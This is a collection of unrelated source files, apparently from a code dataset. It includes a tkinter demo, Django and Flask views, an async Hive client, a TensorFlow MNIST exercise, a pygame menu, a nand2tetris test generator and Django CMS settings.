5)\nbox2.grid(row = 2, column = 1, padx = 5, pady = 5)\n\n#define entry box \n\ncircleVar = StringVar()\ncircletext = Entry(window, textvariable=circleVar)\n\n#define out box \n\ncircleVar2 = StringVar()\ncircletext2 = Entry(window, textvariable=circleVar2)\n\n\n#display boxes\ncircletext.grid(row = 1, column = 2,)\ncircletext2.grid(row = 2, column = 2,)\n\n#define buttons - the button variable must not reuse the name of the response() function\n\nresponsebtn = Button( window, text ='Response', command=response)\nexitbtn = Button( window, text ='Exit', command=exit)\n\n#place buttons\n\nresponsebtn.grid(row = 4, column = 1, padx = 1, pady = 1)\nexitbtn.grid(row = 4, column = 2, padx = 1, pady = 1)\n\n#display window\n\nwindow.mainloop()\n\n\n#while(True):\n#    raw_input(\"Enter your question: \")\n \n","sub_path":"gui_demos/magic8-GUI.py","file_name":"magic8-GUI.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"633959669","text":"from django.shortcuts import render\r\n\r\n# Create your views here.\r\ndef index(req):\r\n    return render(req, 'form.html')\r\n\r\ndef login(req):\r\n    username = \"\"\r\n\r\n    errors = []\r\n\r\n    if 'username' in req.POST:\r\n        username = req.POST['username']\r\n\r\n        if not username:\r\n            errors.append(\"Please fill this field\")\r\n        elif len(username) < 10:\r\n            errors.append(\"Must be at least 10 characters\")\r\n\r\n        else:\r\n            return render(req, 'login.html', {'username' : username})\r\n\r\n\r\n    return render(req, 'form.html', {\"errors\" : errors})","sub_path":"tutorial/ajax_call/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"19100804","text":"import asyncio\nimport aiohs2\nimport pandas as pd\n\nfrom functools import wraps\ncoroutine = asyncio.coroutine\n\nclass AioHive:\n    def __init__(self, host, port=10000):\n        \"\"\"\n        coroutine based hive client\n\n        Parameters\n        ==========\n        host : str\n            host of the hiveserver2 to connect to\n        port : int, default 10000\n            port of the hiveserver2\n        \"\"\"\n        self.cli = aiohs2.Client(host=host, port=port)\n\n    def execute(self, request):\n        \"\"\" execute request without looking at returns \"\"\"\n        cur = yield from self.cli.cursor()\n        try:\n            yield from cur.execute(request)\n        finally:\n            yield from cur.close()\n\n    def fetch(self, hql, chunk_size=10000):\n        \"\"\" execute request and fetch answer as DataFrame \"\"\"\n        cur = yield from self.cli.cursor()\n        try:\n            yield from cur.execute(hql)\n            schema = yield from cur.getSchema()\n            columns = pd.Index([nfo['columnName'] for nfo in schema])\n\n            return pd.DataFrame((yield from cur.fetch(maxRows=chunk_size)) or None, columns=columns)\n        finally:\n            yield from cur.close()\n\n    def iter(self, hql, chunk_size=10000):\n        \"\"\" execute request and iterate over chunks of resulting DataFrame \"\"\"\n        cur = yield from self.cli.cursor()\n\n        try:\n            yield from cur.execute(hql)\n            schema = yield from cur.getSchema()\n            columns = pd.Index([nfo['columnName'] for nfo in schema])\n\n            chunks = cur.iter(maxRows=chunk_size)\n\n            class local:\n                offset=0\n                empty=None\n\n            @coroutine\n            def to_frame(chunk_co):\n                data = pd.DataFrame((yield from chunk_co) or local.empty, columns=columns)\n                data.index += local.offset\n\n                local.offset += len(data)\n                if local.empty is None:\n                    local.empty = data[:0].copy()\n                return data\n\n            def closing():\n                try:\n                    for chunk in chunks:\n                        # here we yield the coroutine that will fetch the data and put it in a frame\n                        yield to_frame(chunk)\n                finally:\n                    # 
while ensuring that the cursor is closed after the request is done ....\n                    cur.close()\n\n            return closing()\n\n        except:\n            yield from cur.close()\n            raise\n\nclass SyncedHive:\n    def __init__(self, *args, hive=None, **kws):\n        \"\"\"\n        synced wrapper around the asyncio hive class\n\n        Parameters\n        ==========\n        host : str\n            host of the hiveserver2 to connect to\n        port : int, default 10000\n            port of the hiveserver2\n        hive : AioHive, optional\n            existing async hive client\n        \"\"\"\n        self.hive = hive or AioHive(*args, **kws)\n        self.loop = asyncio.get_event_loop()\n\n    def run(self, coro):\n        return self.loop.run_until_complete(coro)\n\n    def synced(name):\n        func = getattr(AioHive, name)\n        @wraps(func)\n        def synced(self, *args, **kws):\n            return self.run(func(self.hive, *args, **kws))\n        return synced\n\n    execute = synced('execute')\n    fetch = synced('fetch')\n\n    def iter(self, *args, **kws):\n        for chunk in self.run(self.hive.iter(*args, **kws)):\n            data = self.run(chunk)\n            if not data.empty:\n                yield data\n\nHive = SyncedHive\n
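\n# Usage sketch (added for illustration, not part of the original module;\n# assumes a reachable HiveServer2 instance):\n# hive = Hive('localhost', port=10000)\n# df = hive.fetch('SELECT * FROM some_table LIMIT 10')\n# for chunk in hive.iter('SELECT * FROM big_table', chunk_size=50000):\n#     ...  # each chunk is a pandas DataFrame\n","sub_path":"hive/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"422605341","text":"from flask import Flask, json, jsonify\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy import create_engine, func\nimport datetime as dt\nimport numpy as np\n\n\nengine = create_engine(\"sqlite:///titanic.sqlite\")\n\n#################################################\n# Database Setup\n#################################################\nengine = create_engine(\"sqlite:///hawaii.sqlite\")\n\n# reflect an existing database into a new model\nBase = automap_base()\n# reflect the tables\nBase.prepare(engine, reflect=True)\n\n# Save reference to the table\nMeasurement = Base.classes.measurement\nStation = Base.classes.station\n\n\n#################################################\n# Flask Setup\n#################################################\napp = Flask(__name__)\n\n\n#################################################\n# Flask Routes\n#################################################\n@app.route(\"/\")\ndef home():\n    return (\n        f\"Available Routes: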
\"\n f\"/api/v1.0/precipitation
\"\n f\"/api/v1.0/stations
\"\n f\"/api/v1.0/tobs
\"\n f\"/api/v1.0/2017-08-20
\"\n f\"/api/v1.0/2017-08-17/2017-08-20
\"\n )\n\n@app.route(\"/api/v1.0/precipitation\")\ndef prcp():\n\n session = Session(engine)\n \n # Find the most recent date in the data set.\n recent_date = session.query(Measurement.date).order_by(Measurement.date.desc()).first()\n\n # Calculate the date one year from the last date in data set.\n year_ago = dt.datetime(2017,8,23)- dt.timedelta(days = 365)\n\n # Perform a query to retrieve the data and precipitation scores\n results = session.query(Measurement.date, Measurement.prcp).\\\n filter(Measurement.date >= year_ago).\\\n order_by(Measurement.date).all()\n\n dates = [result[0] for result in results]\n prcps = [result[1] for result in results]\n\n # Save the query results in a dictionary - keys=dates and values=prcps\n prcp_dict = dict(zip(dates, prcps))\n precip = {date: prcp for date, prcp in results}\n return jsonify(prcp_dict)\n\n@app.route(\"/api/v1.0/stations\")\ndef stations():\n session = Session(engine)\n\n results = session.query(Station.station).all()\n\n all_stations = list(np.ravel(results))\n\n return jsonify(all_stations)\n\n@app.route(\"/api/v1.0/tobs\")\ndef tobs():\n session = Session(engine)\n\n year_ago = dt.datetime(2017,8,23)- dt.timedelta(days = 365)\n\n # Design a query to find the most active stations (i.e. what stations have the most rows?)\n # List the stations and the counts in descending order.\n observation_counts = session.query(Measurement.station, func.count(Measurement.station)).\\\n group_by(Measurement.station).\\\n order_by(func.count(Measurement.station).desc()).all()\n\n most_active_station = observation_counts[0][0]\n \n # Query the last 12 months of tobs data for this station and plot the results as a histogram\n results = session.query(Measurement.date, Measurement.tobs).\\\n filter(Measurement.date >= year_ago).\\\n filter(Measurement.station == most_active_station).\\\n order_by(Measurement.date).all()\n\n dates = [result[0] for result in results]\n temps = [result[1] for result in results]\n\n # Save the query results in a dictionary - keys=dates and values=temps\n prcp_dict = dict(zip(dates, temps))\n \n return jsonify(prcp_dict)\n\n@app.route(\"/api/v1.0/\")\ndef start_tobs(start):\n \n session = Session(engine)\n\n min = session.\\\n query(func.min(Measurement.tobs)).\\\n filter(Measurement.date >= start).first()\n max = session.\\\n query(func.max(Measurement.tobs)).\\\n filter(Measurement.date >= start).first()\n avg = session.\\\n query(func.avg(Measurement.tobs)).\\\n filter(Measurement.date >= start).first()\n\n list= [min[0], max[0], avg[0]]\n return jsonify(list)\n\n@app.route(\"/api/v1.0//\")\ndef start__end_tobs(start, end):\n \n session = Session(engine)\n\n min = session.\\\n query(func.min(Measurement.tobs)).\\\n filter(Measurement.date >= start).filter(Measurement.date <= end).first()\n max = session.\\\n query(func.max(Measurement.tobs)).\\\n filter(Measurement.date >= start).filter(Measurement.date <= end).first()\n avg = session.\\\n query(func.avg(Measurement.tobs)).\\\n filter(Measurement.date >= start).filter(Measurement.date <= end).first()\n\n list= [min[0], max[0], avg[0]]\n return jsonify(list)\n\n\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","sub_path":"climate_app.py","file_name":"climate_app.py","file_ext":"py","file_size_in_byte":4519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"507254603","text":"\n# coding: utf-8\n\n# CSDN AI 挑战课 任务一:\n# 改动的部分有:\n# 隐层层数由1改成2, 隐层节点数由100增加到300\n# 初始化参数 stddev 由0.05,0.05,0.063改成0.1,0.1,0.08\n# 
the loss function now includes l2 regularization, with penalty factor 0.00003\n# the learning rate is now decayed dynamically, with an initial learning rate of 0.5, decay_rate=0.91, decay_step=200\n# finally, following a tip from the group, the second if in the scoring part of the source was changed to elif (a small bug)\n# the final run reaches an accuracy of just over 0.98; the content below was exported directly from tinymind\n\n# In this assignment we use tensorflow to implement a simple fully connected network for handwritten digit recognition, and use it for a\n# simple recognition demo.\n# \n# Participants should apply what was taught in the videos: dropout, learning rate decay, initialization and so on, to push the network's final score on the validation data as high as possible.\n# \n# - accuracy >= 98%: 100 points\n# - 98% > accuracy >= 96%: 60 points\n# - accuracy < 96%: 0 points\n# \n\n# First, import the libraries we use.\n\n# In[1]:\n\n\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nfrom matplotlib import pyplot as plt\n\nget_ipython().run_line_magic('matplotlib', 'inline')\n\ntf.logging.set_verbosity(tf.logging.INFO)\n\n\n# Let's first see what the data looks like\n\n# In[2]:\n\n\nmnist = input_data.read_data_sets(\"./\")\n\nprint(mnist.train.images.shape)\nprint(mnist.train.labels.shape)\n\nprint(mnist.validation.images.shape)\nprint(mnist.validation.labels.shape)\n\nprint(mnist.test.images.shape)\nprint(mnist.test.labels.shape)\n\n\n# You can see that images holds a varying number of pictures; each picture is a one-dimensional vector of length 28x28,\n# so it has to be reshaped back into a 28x28 two-dimensional image before use. labels holds the digit value corresponding to each picture.\n\n# In[3]:\n\n\nplt.figure(figsize=(8,8))\n\nfor idx in range(16):\n    plt.subplot(4,4, idx+1)\n    plt.axis('off')\n    plt.title('[{}]'.format(mnist.train.labels[idx]))\n    plt.imshow(mnist.train.images[idx].reshape((28,28)))\n\n\n# Next, define the network used for training, starting with its inputs.\n# \n# Here we feed in the data above directly, so we define two placeholders, one for the images and one for the label data, plus a float variable for setting the learning rate.\n# \n# To make the network run more efficiently, several samples are grouped into a batch before being fed in; the first dimension of both placeholders is the batch size, and since the batch size is not fixed yet, the first dimension is left empty.\n\n# In[4]:\n\n\nx = tf.placeholder(\"float\", [None, 784])\ny = tf.placeholder(\"int64\", [None])\nlearning_rate = tf.placeholder(\"float\")\n\n\n# In[10]:\n\n\ndef initialize(shape, stddev=0.1):\n    return tf.truncated_normal(shape, stddev=stddev)\n\nL1_units_count = 300\n\nW_1 = tf.Variable(initialize([784, L1_units_count], stddev=0.1))\nb_1 = tf.Variable(initialize([L1_units_count]))\nlogits_1 = tf.matmul(x, W_1) + b_1\noutput_1 = tf.nn.relu(logits_1)\n\nW_1_x = tf.Variable(initialize([L1_units_count, L1_units_count], stddev=0.1))\nb_1_x = tf.Variable(initialize([L1_units_count]))\nlogits_1_x = tf.matmul(output_1, W_1_x) + b_1_x\noutput_1_x = tf.nn.relu(logits_1_x)\n\nL2_units_count = 10 \nW_2 = tf.Variable(initialize([L1_units_count, L2_units_count], stddev=0.08))\nb_2 = tf.Variable(initialize([L2_units_count]))\nlogits_2 = tf.matmul(output_1_x, W_2) + b_2 \n\nlogits = logits_2\n\n\n# Next, define the loss and the optimizer used to train the network. The loss uses sparse_softmax_cross_entropy_with_logits,\n# which has the advantage that the labels need not be one-hot encoded by hand. An SGD optimizer is used here; the learning rate can be set as needed.\n# \n# >Try it: see what happens when you increase or decrease the learning rate, or train with a different optimizer.\n\n# In[11]:\n\n\ncross_entropy_loss = tf.reduce_mean(\n    tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=y))\\\n    + tf.nn.l2_loss(W_1)*0.00003\n# + tf.contrib.layers.l2_regularizer(0.000001)(W_2)\n\noptimizer = tf.train.GradientDescentOptimizer(\n    learning_rate=learning_rate).minimize(cross_entropy_loss)\n\n\n# Note that the network above outputs the raw logits without softmax, not a probability distribution;\n# to see the probability distribution, softmax still has to be applied.\n# \n# Comparing the outputs against the true labels gives the accuracy of the network's predictions.\n\n# In[12]:\n\n\npred = tf.nn.softmax(logits)\ncorrect_pred = tf.equal(tf.argmax(pred, 1), y)\naccuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n\n# saver is used to save or restore the trained model.\n\n# In[13]:\n\n\nbatch_size = 32\ntrainig_step = 6000\n\nsaver = tf.train.Saver()\n\n\n# Everything defined above is only the computation graph, i.e. just the structure of the network; to actually run it we still need to create a session and feed data into the network.\n\n# In[16]:\n\n\nwith tf.Session() as sess:\n    sess.run(tf.global_variables_initializer())\n\n    # define the validation and test sets\n    validate_data = {\n        x: mnist.validation.images,\n        y: mnist.validation.labels,\n    }\n    test_data = 
{x: mnist.test.images, y: mnist.test.labels}\n\n    for i in range(trainig_step):\n        xs, ys = mnist.train.next_batch(batch_size)\n        _, loss = sess.run(\n            [optimizer, cross_entropy_loss],\n            feed_dict={\n                x: xs,\n                y: ys,\n                learning_rate: 0.5*0.91**(i/200)\n            })\n\n        # print the loss and validation accuracy every 100 training steps\n        if i > 0 and i % 100 == 0:\n            validate_accuracy = sess.run(accuracy, feed_dict=validate_data)\n            print(\n                \"after %d training steps, the loss is %g, the validation accuracy is %g\"\n                % (i, loss, validate_accuracy))\n            saver.save(sess, './model.ckpt', global_step=i)\n\n    print(\"the training is finished!\")\n    # final test accuracy\n    acc = sess.run(accuracy, feed_dict=test_data)\n    print(\"the test accuracy is:\", acc)\n\nif validate_accuracy >=0.98:\n    score = 100\nelif validate_accuracy >=0.96 and validate_accuracy <0.98 :\n    score = 60\nelse:\n    score = 0\nprint('#'*10)\nprint('Your validate_accuracy:[{}]'.format(validate_accuracy))\nprint('Your final score:[{}]'.format(score))\nprint('#'*10)\n\n\n# Below, run a test using the model we trained.\n\n# In[17]:\n\n\nwith tf.Session() as sess:\n    ckpt = tf.train.get_checkpoint_state('./')\n    if ckpt and ckpt.model_checkpoint_path:\n        saver.restore(sess, ckpt.model_checkpoint_path)\n        final_pred, acc = sess.run(\n            [pred, accuracy],\n            feed_dict={\n                x: mnist.test.images[:16],\n                y: mnist.test.labels[:16]\n            })\n        orders = np.argsort(final_pred)\n        plt.figure(figsize=(8, 8))\n        print(acc)\n        for idx in range(16):\n            order = orders[idx, :][-1]\n            prob = final_pred[idx, :][order]\n            plt.subplot(4, 4, idx + 1)\n            plt.axis('off')\n            plt.title('{}: [{}]-[{:.1f}%]'.format(mnist.test.labels[idx],\n                                                  order, prob * 100))\n            plt.imshow(mnist.test.images[idx].reshape((28, 28)))\n\n    else:\n        pass\n\n\n# With the parameters provided by the assignment, the few digits shown above look quite good, but the overall accuracy is not ideal.\n","sub_path":"MNIST Full Connection.py","file_name":"MNIST Full Connection.py","file_ext":"py","file_size_in_byte":7206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"428870192","text":"import pygame\r\nfrom pygame.locals import *\r\nimport Ferramentas_menu2 as ferramentas2\r\nimport menu\r\n\r\npygame.init() #start pygame\r\n\r\n#colors\r\nvermelho = [255,0,0]\r\npreto = [0, 0, 0]\r\n\r\ntamanho = largura, altura = (700, 460) #screen size (width x height)\r\npygame.display.set_caption('COBRINHA SHOW') # message at the top of the screen\r\ntela = pygame.display.set_mode(tamanho)\r\n\r\nimagem_fundo = 'ajuda.jpg' #background image\r\nimagem = pygame.image.load(imagem_fundo).convert()\r\nclock = pygame.time.Clock()\r\n\r\ndef ajuda(): #help screen for the game\r\n\r\n    while True:\r\n        for event in pygame.event.get():\r\n            if event.type == QUIT:\r\n                exit()\r\n        tela.blit(imagem, (0, 0))\r\n        pygame.display.update()\r\n\r\n        #option to go back to the main menu\r\n        cursor3 = ferramentas2.fer_menu2(tela, ['VOLTAR'], 30, 425, None, 30, 1.4, preto, vermelho)\r\n\r\n        if cursor3 == 0: #if the chosen option is 0, go back to the main menu\r\n            menu.menu_principal()\r\n\r\n    exit()\r\n\r\n\r\n","sub_path":"Projeto_Algoritmos - IFPB/Jogo/Códigos/menu3.py","file_name":"menu3.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"377227766","text":"import random\nfrom itertools import product\n\nselect_list = [''.join(b) for b in product('01', repeat=3)] # get all length-3 binary strings, '000' through '111'\n\ncmp = open(\"Mux8Way16.cmp\", 'w')\ntst = open(\"Mux8Way16.tst\", 'w')\ncmp.write(\"| a | b | c | d | e | f | g | h | sel | out |\\n\")\ntst.write(\n'''// Author: A: Matthew Kovar\n// This test is not exhaustive; it tests the scenario in which all inputs are identical 
and other scenarios in which inputs are almost certainly not identical\n// Given that each 16 bit input was chosen at random, the chance that any two of them match is extremely small\nload Mux8Way16.hdl,\noutput-file Mux8Way16.out,\ncompare-to Mux8Way16.cmp,\noutput-list a%B1.16.1 b%B1.16.1 c%B1.16.1 d%B1.16.1 e%B1.16.1 f%B1.16.1 g%B1.16.1 h%B1.16.1 sel%B2.3.2 out%B1.16.1;\n\n'''\n)\n\n# all inputs are the same\nfor j, sel in enumerate(select_list):\n a = '0'*16\n out = a\n cmp.write(\"| {} | {} | {} | {} | {} | {} | {} | {} | {} | {} |\\n\".format(a, a, a, a, a, a, a, a, sel, out))\n tst.write('set {} %B{},\\n'.format(chr(j+97), a))\ntst.write(\"\\n\")\nfor i in range(8):\n tst.write('''set sel {}, eval, output;\\n'''.format(i))\ntst.write(\"\\n\")\n\n# all inputs are (most likely) different\nfor i in range(int(256/8) - 1): # test 8 inputs at a time\n all = [''.join([random.choice('01') for k in range(16)]) for l in range(8)] # all 16 bit inputs {a, b, c, d, e, f, g, h}\n for j, sel in enumerate(select_list):\n out = all[int(sel, 2)] # convert binary to decimal and access by index\n cmp.write(\"| {} | {} | {} | {} | {} | {} | {} | {} | {} | {} |\\n\".format(all[0], all[1], all[2], all[3], all[4], all[5], all[6], all[7], sel, out))\n for k, kval in enumerate(all):\n tst.write('set {} %B{},\\n'.format(chr(k+97), kval)) # set {letter} %B{16 bit input value}\n tst.write(\"\\n\")\n for k in range(8):\n tst.write('''set sel {}, eval, output;\\n'''.format(k))\n tst.write(\"\\n\")\ntst.close()\ncmp.close()","sub_path":"test_generator/Mux8Way16.py","file_name":"Mux8Way16.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"483600597","text":"# -*- coding: utf-8 -*-\n\nimport os\n\nsettings_dir = os.path.abspath(os.path.dirname(__file__))\n\n# Dummy function, so that \"makemessages\" can find strings which should be translated.\n_ = lambda s: s\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\n# A tuple that lists people who get code error notifications. When\n# DEBUG=False and a view raises an exception, Django will e-mail these\n# people with the full exception information. Each member of the tuple\n# should be a tuple of (Full name, e-mail address).\nADMINS = (\n)\n\nMANAGERS = ADMINS\n\nDATABASES = {\n 'default': {\n# 'ENGINE': 'django.db.backends.sqlite3',\n# 'NAME': 'db.sqlite',\n 'ENGINE': 'django.db.backends.postgresql_psycopg2', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.\n 'NAME': 'wlansi', # Or path to database file if using sqlite3.\n 'USER': 'wlansi_cms', # Not used with sqlite3.\n 'PASSWORD': '', # Not used with sqlite3.\n 'HOST': '', # Set to empty string for localhost. Not used with sqlite3.\n 'PORT': '', # Set to empty string for default. Not used with sqlite3.\n },\n}\n\n# Local time zone for this installation. Choices can be found here:\n# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name\n# although not all choices may be available on all operating systems.\n# On Unix systems, a value of None will cause Django to use the same\n# timezone as the operating system.\n# If running in a Windows environment this must be set to the same as your\n# system time zone.\nTIME_ZONE = 'Europe/Ljubljana'\n\n# Language code for this installation. 
All choices can be found here:\n# http://www.i18nguy.com/unicode/language-identifiers.html\nLANGUAGE_CODE = 'sl'\n\nLANGUAGES = (\n ('sl', _('Slovenian')),\n ('en', _('English')),\n)\n\nADMIN_LANGUAGE_CODE = 'en'\n\nimport frontend\nGEOIP_PATH = os.path.abspath(os.path.join(os.path.dirname(frontend.__file__), '..', 'geoip'))\nDEFAULT_COUNTRY = 'SI'\n\nURL_VALIDATOR_USER_AGENT = 'Django'\n\n# Date input formats below take as first argument day and then month in x/y/z format\nDATE_INPUT_FORMATS = (\n '%Y-%m-%d', '%d/%m/%Y', '%d/%m/%y', '%b %d %Y',\n '%b %d, %Y', '%d %b %Y', '%d %b, %Y', '%B %d %Y',\n '%B %d, %Y', '%d %B %Y', '%d %B, %Y',\n)\n\n# All those formats are only defaults and are localized for users\nDATE_FORMAT = 'd/M/Y'\nTIME_FORMAT = 'H:i'\nDATETIME_FORMAT = 'd/M/Y, H:i'\nYEAR_MONTH_FORMAT = 'F Y'\nMONTH_DAY_FORMAT = 'j F'\nSHORT_DATE_FORMAT = 'd/m/y'\nSHORT_DATETIME_FORMAT = 'd/m/y H:i'\nFIRST_DAY_OF_WEEK = 1\nDECIMAL_SEPARATOR = '.'\nTHOUSAND_SEPARATOR = ','\nNUMBER_GROUPING = 0\n\n# We override defaults\nFORMAT_MODULE_PATH = 'mainpage.formats'\n\nFORCE_SCRIPT_NAME = ''\n\nAUTH_PROFILE_MODULE = 'account.UserProfileAndSettings'\n\nSITE_ID = 1\n\n# If you set this to False, Django will make some optimizations so as not\n# to load the internationalization machinery.\nUSE_I18N = True\n\n# If you set this to False, Django will not format dates, numbers and\n# calendars according to the current locale\nUSE_L10N = True\n\n# Absolute filesystem path to the directory that will hold user-uploaded files.\n# Example: \"/home/media/media.lawrence.com/\"\nMEDIA_ROOT = os.path.join(settings_dir, 'media')\n\n# URL that handles the media served from MEDIA_ROOT. Make sure to use a\n# trailing slash.\n# Examples: \"http://media.lawrence.com/media/\", \"http://example.com/media/\"\nMEDIA_URL = '/media/'\n\n# Absolute path to the directory static files should be collected to.\n# Don't put anything in this directory yourself; store your static files\n# in apps' \"static/\" subdirectories and in STATICFILES_DIRS.\n# Example: \"/home/media/media.lawrence.com/static/\"\nSTATIC_ROOT = os.path.join(settings_dir, 'static')\n\n# URL prefix for static files.\n# Example: \"http://media.lawrence.com/static/\"\nSTATIC_URL = '/static/'\n\n# URL prefix for admin static files -- CSS, JavaScript and images.\n# Make sure to use a trailing slash.\n# Examples: \"http://foo.com/static/admin/\", \"/static/admin/\".\nADMIN_MEDIA_PREFIX = '/static/admin/'\n\n# Additional locations of static files\nSTATICFILES_DIRS = (\n # Put strings here, like \"/home/html/static\" or \"C:/www/django/static\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not relative paths.\n)\n\n# List of finder classes that know how to find static files in\n# various locations.\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n# 'django.contrib.staticfiles.finders.DefaultStorageFinder',\n)\n\nSECRET_KEY = 'u=@fy7qlo@e2ga1xv5=f(d1xx1$6bzj@em(9-5dhu)7as*#^5$'\n\nEMAIL_HOST = 'localhost'\nEMAIL_SUBJECT_PREFIX = '[wlan-si] '\nDEFAULT_FROM_EMAIL = 'open@wlan-si.net'\nSERVER_EMAIL = DEFAULT_FROM_EMAIL\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n# 'django.template.loaders.eggs.Loader',\n)\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n 
'django.contrib.auth.context_processors.auth',\n 'django.core.context_processors.debug',\n 'django.core.context_processors.i18n',\n 'django.core.context_processors.media',\n 'django.core.context_processors.static',\n 'django.core.context_processors.request',\n 'django.contrib.messages.context_processors.messages',\n 'cms.context_processors.media',\n 'sekizai.context_processors.sekizai',\n 'mainpage.wlansi.context_processors.global_vars',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'cms.middleware.multilingual.MultilingualURLMiddleware',\n 'wlansi.middleware.ForceAdminLanguage',\n 'cmsplugin_blog.middleware.MultilingualBlogEntriesMiddleware',\n 'cms.middleware.page.CurrentPageMiddleware',\n 'cms.middleware.user.CurrentUserMiddleware',\n 'django.middleware.transaction.TransactionMiddleware',\n)\n\nROOT_URLCONF = 'mainpage.urls'\n\nMESSAGE_STORAGE = 'django.contrib.messages.storage.session.SessionStorage'\n\nTEMPLATE_DIRS = (\n # Put strings here, like \"/home/html/django_templates\" or \"C:/www/django/templates\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not relative paths.\n# os.path.join(settings_dir, 'templates'),\n)\n\nINSTALLED_APPS = (\n # Here because of the weird import order problems with templates and sekizai\n 'cmsplugin_markup_tracwiki',\n\n # Ours are first so that we can override default templates in other apps\n 'frontend.account',\n 'mainpage.wlansi',\n 'mainpage.wlansi.donations',\n 'mainpage.wlansi.inmedia',\n 'mainpage.wlansi.news',\n\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.admin',\n 'django.contrib.admindocs',\n 'django.contrib.staticfiles',\n\n 'cms',\n 'mptt',\n 'menus',\n 'south',\n 'easy_thumbnails',\n 'filer',\n 'tagging',\n 'reversion',\n 'sekizai',\n 'djangocms_utils',\n 'simple_translation',\n 'cmsplugin_blog',\n 'cms.plugins.snippet',\n #'cms.plugins.inherit',\n 'cmsplugin_filer_file',\n 'cmsplugin_filer_folder',\n 'cmsplugin_filer_teaser',\n 'cmsplugin_filer_video',\n 'cmsplugin_filer_image',\n 'cmsplugin_markup',\n 'cmsplugin_contact',\n 'missing',\n)\n\n# A sample logging configuration. 
The only tangible logging\n# performed by this configuration is to send an email to\n# the site admins on every HTTP 500 error.\n# See http://docs.djangoproject.com/en/dev/topics/logging for\n# more details on how to customize your logging configuration.\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'class': 'django.utils.log.AdminEmailHandler'\n }\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n }\n}\n\nLOGIN_REDIRECT_URL = '/admin/'\nLOGIN_URL = '/admin/'\nLOGOUT_URL = '/admin/'\n\nAUTHENTICATION_BACKENDS = (\n 'frontend.account.auth.ModelBackend',\n 'frontend.account.auth.AprBackend',\n 'frontend.account.auth.CryptBackend',\n)\n\nFORCE_LOWERCASE_TAGS = True\n\nCMS_TEMPLATES = (\n ('simple.html', 'Simple Page'),\n ('simple_with_right.html', 'Simple Page with Right Column'),\n ('main.html', 'Main Page'),\n ('blog.html', 'Blog Page'),\n)\n\n# Not really used as we are not using django-cms core plugins for files but django-filer\n#CMS_PAGE_MEDIA_PATH = 'assets/'\n\nCMS_USE_TINYMCE = False\n\nCMS_MARKUP_OPTIONS = (\n 'cmsplugin_markup_tracwiki',\n)\n\nCMS_MARKUP_TRAC_INTERTRAC = {\n 'grow': {\n 'TITLE': 'wlan slovenia growing',\n 'URL': 'http://grow.wlan-si.net',\n },\n 'interop': {\n 'TITLE': 'Open Networks Interoperability',\n 'URL': 'http://interop.wlan-si.net',\n },\n 'dev': {\n 'TITLE': 'wlan slovenia development',\n 'URL': 'http://dev.wlan-si.net',\n },\n}\n\nCMS_MARKUP_TRAC_INTERWIKI = {\n 'nodes': {\n 'URL': 'https://nodes.wlan-si.net/',\n },\n 'lists': {\n 'URL': 'http://wlan-si.net/lists/arc/$1/$2-$3/msg$4.html',\n },\n 'skypechat': {\n 'URL': 'skype:?chat&blob=',\n },\n 'wikipedia': {\n 'URL': 'http://en.wikipedia.org/wiki/',\n },\n 'slwikipedia': {\n 'URL': 'http://sl.wikipedia.org/wiki/',\n },\n}\n\nCMS_MARKUP_TRAC_CONFIGURATION = {\n 'tracmath': {\n 'cache_dir': os.path.join(settings_dir, 'tracwiki', 'cache'),\n }\n}\n\nCMS_MARKUP_TRAC_TEMPLATES_DIR = os.path.join(settings_dir, 'tracwiki', 'templates')\n\nCMS_MARKUP_TRAC_COMPONENTS = (\n 'tracdashessyntax.plugin.DashesSyntaxPlugin',\n 'footnotemacro.macro.FootNoteMacro',\n 'mathjax.api.MathJaxPlugin',\n 'tracmath.tracmath.TracMathPlugin',\n)\n\nCMS_LANGUAGES_URL_IGNORE_PREFIXES = (\n '/lists',\n)\n\nCMS_URL_OVERWRITE = False\nCMS_MENU_TITLE_OVERWRITE = 